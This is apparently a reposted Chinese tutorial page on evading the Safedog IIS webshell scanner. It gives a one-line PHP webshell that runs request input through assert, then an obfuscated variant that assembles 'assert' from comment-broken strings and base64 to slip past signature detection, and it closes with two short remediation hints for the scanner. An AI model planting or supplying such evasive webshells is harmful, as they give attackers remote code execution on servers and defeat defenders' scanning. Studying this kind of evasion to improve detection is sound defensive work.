奇淫巧技绕过安全狗webshell查杀及修复建议 - 网站

安全狗版本：iis3.3最新版

原形

<?php assert($_REQUEST["AG"]);?>

处理掉assert的函数原形即可绕过

<?php $jm='MQ=='; $s=base64_decode($jm); $a="a"./*-/*-*/"ss"./*-/*-*/"er"./*-/*-*/"t"; $b=base64_encode($a); $c=base64_decode($b); $c($_REQUEST[$s]); ?>

修复方案：

#1.增加相应的查杀库 #2.用正则过滤掉垃圾字符再用特征库识别效果会好一些

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://www.haodehen.cn/did15115

更新时间：2022-09-13 阅读：51次